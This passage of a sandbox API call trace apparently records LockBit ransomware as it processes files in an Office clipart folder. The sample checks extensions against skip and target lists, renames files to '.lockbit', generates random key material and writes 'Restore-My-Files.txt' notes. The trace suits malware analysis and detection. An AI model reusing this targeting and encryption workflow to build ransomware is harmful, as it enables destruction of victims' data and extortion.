lpString2=".WMF") returned -1 [0109.855] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.855] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.855] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.855] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.855] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.855] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.855] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.855] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.855] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.855] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.855] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.856] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.856] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.856] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.856] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.856] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.856] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.856] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.856] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.856] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.856] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.856] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF.lockbit") returned 72 [0109.856] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0109.859] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.860] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.860] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2262) returned 1 [0109.860] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.860] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.860] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.860] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.861] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.862] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.862] malloc (_Size=0xa6) returned 0x77d800 [0109.862] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.863] free (_Block=0x77d800) [0109.863] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.863] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.863] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.863] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x51c76e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x8d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="CLIP.WMF", cAlternateFileName="")) returned 1 [0109.863] lstrcmpiW (lpString1=".", lpString2="CLIP.WMF") returned -1 [0109.863] lstrcmpiW (lpString1="..", lpString2="CLIP.WMF") returned -1 [0109.863] PathFindExtensionW (pszPath="CLIP.WMF") returned=".WMF" [0109.863] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.864] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.864] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.864] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.864] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.864] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.864] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.864] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.864] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.864] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.864] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.864] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.864] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.864] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.864] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.864] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.864] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.864] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.864] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.864] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.864] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.864] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.864] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.864] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.864] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.864] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.864] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.864] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.864] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.865] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.865] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.865] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.865] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.865] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.865] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.865] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.865] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.865] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.865] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.865] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.865] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.865] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.865] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.865] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.865] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.865] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.865] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.865] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="CLIP.WMF") returned 1 [0109.865] lstrcmpiW (lpString1="ntldr", lpString2="CLIP.WMF") returned 1 [0109.865] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="CLIP.WMF") returned 1 [0109.865] lstrcmpiW (lpString1="bootsect.bak", lpString2="CLIP.WMF") returned -1 [0109.865] lstrcmpiW (lpString1="autorun.inf", lpString2="CLIP.WMF") returned -1 [0109.865] lstrcmpiW (lpString1="thumbs.db", lpString2="CLIP.WMF") returned 1 [0109.865] lstrcmpiW (lpString1="iconcache.db", lpString2="CLIP.WMF") returned 1 [0109.865] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.865] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned=".WMF" [0109.865] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.866] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.866] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.866] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.866] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.866] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.866] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.866] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.866] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.866] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.866] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.866] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.866] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.866] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.866] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.866] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.866] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.866] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.866] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.866] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.866] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.866] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.866] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.866] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.866] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.866] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.867] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.867] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.867] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF.lockbit") returned 68 [0109.867] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0109.924] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.924] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.924] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2262) returned 1 [0109.924] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.925] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.925] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.926] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.926] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.926] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0109.936] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.936] malloc (_Size=0x9e) returned 0x2073f40 [0109.936] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x2073f40, Length=0x9e, FileInformationClass=0xa) returned 0xc0000008 [0109.936] free (_Block=0x2073f40) [0109.937] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.937] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.937] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.937] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x603a86d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x1b3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="CMNTY_01.MID", cAlternateFileName="")) returned 1 [0109.937] lstrcmpiW (lpString1=".", lpString2="CMNTY_01.MID") returned -1 [0109.937] lstrcmpiW (lpString1="..", lpString2="CMNTY_01.MID") returned -1 [0109.937] PathFindExtensionW (pszPath="CMNTY_01.MID") returned=".MID" [0109.937] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0109.937] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0109.937] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0109.937] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0109.937] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0109.937] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0109.937] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0109.937] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0109.937] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0109.937] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0109.937] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0109.937] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0109.937] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0109.938] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0109.938] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0109.938] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0109.938] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0109.938] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0109.938] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0109.938] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0109.938] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0109.938] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0109.938] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0109.938] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0109.938] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0109.938] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0109.938] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0109.938] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0109.938] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0109.938] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0109.938] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0109.938] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0109.938] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0109.938] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0109.938] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0109.938] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0109.938] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0109.939] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0109.939] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0109.939] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0109.939] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0109.939] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0109.939] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0109.939] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0109.939] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0109.939] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0109.939] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0109.939] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="CMNTY_01.MID") returned 1 [0109.939] lstrcmpiW (lpString1="ntldr", lpString2="CMNTY_01.MID") returned 1 [0109.939] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="CMNTY_01.MID") returned 1 [0109.939] lstrcmpiW (lpString1="bootsect.bak", lpString2="CMNTY_01.MID") returned -1 [0109.939] lstrcmpiW (lpString1="autorun.inf", lpString2="CMNTY_01.MID") returned -1 [0109.939] lstrcmpiW (lpString1="thumbs.db", lpString2="CMNTY_01.MID") returned 1 [0109.939] lstrcmpiW (lpString1="iconcache.db", lpString2="CMNTY_01.MID") returned 1 [0109.939] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.939] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned=".MID" [0109.939] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0109.940] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0109.940] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0109.940] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0109.940] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0109.940] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0109.940] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0109.940] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0109.940] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0109.940] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0109.940] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0109.940] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0109.940] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0109.940] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0109.940] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0109.940] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0109.940] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0109.940] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0109.940] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0109.940] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0109.940] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0109.940] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0109.940] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0109.940] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0109.940] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0109.940] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0109.940] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0109.940] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0109.941] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID.lockbit") returned 72 [0109.941] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0109.941] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.941] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.942] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=6970) returned 1 [0109.942] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.942] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.942] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.943] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.943] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.948] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.948] malloc (_Size=0xa6) returned 0x77d800 [0109.949] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0109.954] free (_Block=0x77d800) [0109.954] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.954] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.954] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.954] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6849b000, ftCreationTime.dwHighDateTime=0x1bd0318, ftLastAccessTime.dwLowDateTime=0x51d0f390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6849b000, ftLastWriteTime.dwHighDateTime=0x1bd0318, nFileSizeHigh=0x0, nFileSizeLow=0x1496, dwReserved0=0x0, dwReserved1=0x0, cFileName="CRANE.WMF", cAlternateFileName="")) returned 1 [0109.954] lstrcmpiW (lpString1=".", lpString2="CRANE.WMF") returned -1 [0109.954] lstrcmpiW (lpString1="..", lpString2="CRANE.WMF") returned -1 [0109.954] PathFindExtensionW (pszPath="CRANE.WMF") returned=".WMF" [0109.954] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.954] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.954] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.954] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.954] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.954] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.954] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.954] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.954] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.954] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.955] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.955] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.955] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned 